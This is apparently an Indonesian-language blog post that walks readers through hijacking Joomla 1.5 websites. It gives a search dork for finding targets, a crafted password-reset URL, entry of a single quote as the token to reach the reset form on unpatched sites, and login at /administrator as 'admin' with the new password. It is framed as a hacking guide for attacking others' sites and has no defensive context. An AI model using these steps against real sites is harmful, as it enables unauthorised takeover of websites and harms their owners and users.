Postingan
oke, yang kita cari disini adalah joomla versi 1.5
dork yang dipake yaitu option=com_user
nanti kalau sudah dapat target, misalkan targetnya adalah :
http://target.com/index.php?option=com_user&view=reset
atau
http://target.com/index.php?option=com_user&view=reset
atau
http://target.com/index.php?option=com_u...w=register
atau
http://target.com/index.php?option=com_user&view=login
atau
http://target.com/index.php?option=com_user&view=remind
maka yang harus dilakukan adalah mengganti view dengan mengganti view=reset dan layout=confirm
jadi contohnya adalah :
http://target.com/index.php?option=com_u...ut=confirm
nah... dari situ nantinya akan keluar form token, ngga perlu bingung kalo ngga tau harus input apa,
tinggal masukin kutip satu (') , kalau web tersebut belom di patch, maka akan masuk kedalam menu reset password
tinggal masukin aja deh password yang diinginkan, beres.
oke, tahap selanjutnya adalah dengan masuk kedalam menu administrator, misalkan http://target.com/administrator
nah, tinggal masukin deh username "admin" atau "administrator" dan password dengan password yang barusan diganti tadi.
selesai.
gampang kan ?
ayo, majukan kemampuan hacker indonesia !!!
Tidak ada komentar:
Posting Komentar